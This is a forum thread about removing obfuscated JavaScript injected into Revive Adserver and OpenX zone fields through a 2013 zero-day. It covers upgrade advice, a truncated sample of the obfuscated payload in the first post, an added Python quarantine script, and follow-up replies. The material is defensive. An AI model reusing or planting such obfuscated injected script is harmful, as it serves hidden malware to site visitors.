Hey_neken Posted January 2, 2014

If someone is suffering alerts from Avast alerting about some trojan in the invocation code as shown on #224 ( https://github.com/revive-adserver/revive-adserver/issues/224 ) please do the following:

- Upgrade to revive-adserver-3.0.2 ASAP. The bug is present on <=revive-adserver-3.0.1 and on OpenX (confirmed on 2.8.7 to 2.8.11). This won't fix the problem but will prevent more attacks. More info at: http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/
- Look in 'ox_zones' table for any suspicious code. The code will be on the 'prepend' and 'append' fields. It will look something like:

<script>try{$a=~[];$a={___:++$a,$$$$![]+\"\")[$a],__$:++$a,$_$_![]+\"\")[$a],_$_:++$a,$_$${}+\"\")[$a],$$_$$a[$a]+\"\")[$a],_$$:++$a,$$$_!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__{}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$ (...)

- Empty those fields
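
One way to script the check-and-empty step from the post above, as an added example that is not part of the original posts and is not Revive Adserver code. It assumes an in-memory SQLite table standing in for the real `ox_zones` table; the `zoneid` and `zonename` columns, the `zones_quarantine` table, the thresholds and all sample rows are constructed for illustration.

```python
import re
import sqlite3

# Long <script> bodies that are mostly punctuation match the sample in the post.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)(?:</script>|\Z)", re.I | re.S)
FIELDS = ("prepend", "append")  # the two columns named in the post

def looks_obfuscated(value, min_len=40, max_alnum_ratio=0.35):
    for body in SCRIPT_RE.findall(value or ""):
        if len(body) >= min_len:
            alnum = sum(ch.isalnum() for ch in body)
            if alnum / len(body) <= max_alnum_ratio:
                return True
    return False

def find_suspicious_zones(conn):
    rows = conn.execute('SELECT zoneid, "prepend", "append" FROM ox_zones ORDER BY zoneid')
    return [(zoneid, field) for zoneid, *values in rows
            for field, value in zip(FIELDS, values) if looks_obfuscated(value)]

def quarantine_and_clear(conn, hits):
    """Keep a copy of each flagged value for the incident record, then empty it."""
    with conn:  # single transaction: copy and clear succeed or fail together
        conn.execute("CREATE TABLE IF NOT EXISTS zones_quarantine (zoneid INTEGER, field TEXT, value TEXT)")
        for zoneid, field in hits:
            assert field in FIELDS  # column names cannot be bound parameters
            conn.execute(f'INSERT INTO zones_quarantine SELECT zoneid, ?, "{field}" '
                         "FROM ox_zones WHERE zoneid = ?", (field, zoneid))
            conn.execute(f'UPDATE ox_zones SET "{field}" = \'\' WHERE zoneid = ?', (zoneid,))
    return len(hits)

def build_sample_db():
    """In-memory stand-in for ox_zones holding constructed rows."""
    injected = ('<script>try{$a=~[];$a={___:++$a,__$:++$a,_$_:++$a};'
                '$a.$_=($a.___+"")+($a.__$+"")+($a._$_+"")}catch(e){}')  # constructed, inert
    legit = "<script>var adTracker = window.adTracker || []; adTracker.push('zone-header-view');</script>"
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE ox_zones (zoneid INTEGER PRIMARY KEY, zonename TEXT, "prepend" TEXT, "append" TEXT)')
    conn.executemany("INSERT INTO ox_zones VALUES (?, ?, ?, ?)", [
        (1, "header", legit, ""),
        (2, "sidebar", "", injected),
        (3, "footer", injected, None),
        (4, "popup", "<div class='ad-label'>Advertisement</div>", ""),
    ])
    return conn

if __name__ == "__main__":
    db = build_sample_db()
    print("cleared:", quarantine_and_clear(db, find_suspicious_zones(db)))
```

The punctuation-ratio test is a triage heuristic, so review the quarantined values by hand before treating a zone as clean.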

mx_starter Posted January 2, 2014

I can confirm this procedure, also. My investigation showed that the code is present in the ox_audit table, too. Will post a separate topic in a minute...

andrewatfornax Posted January 5, 2014

For completeness, I think the separate topic suggested is http://forum.revive-adserver.com/topic/92-avast-detecting-trojan-in-the-openx-delivery/